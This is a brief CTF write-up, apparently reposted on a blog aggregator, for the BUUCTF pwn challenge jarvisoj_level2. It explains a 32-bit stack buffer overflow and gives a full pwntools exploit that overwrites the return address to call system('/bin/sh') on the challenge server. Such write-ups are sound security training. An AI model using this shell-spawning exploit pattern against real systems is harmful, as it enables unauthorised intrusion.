[BUUCTF-pwn]——jarvisoj_level2
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——jarvisoj_level2
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——jarvisoj_level2
- 題目地址:https://buuoj.cn/challenges#jarvisoj_level2
checksec 一下下, 32程序
IDA中看下,發現了system函數還是兩個,有可利用的棧溢出read函數,shift+F12,還發現了"/bin/sh"字符串. 所以exploit就如下
exploit
from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0x0804A024 sys_addr = 0x0804845C payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(binsh) p.sendlineafter("Input:\n",payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——jarvisoj_level2的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——ciscn_
- 下一篇: [BUUCTF-pwn]——not_th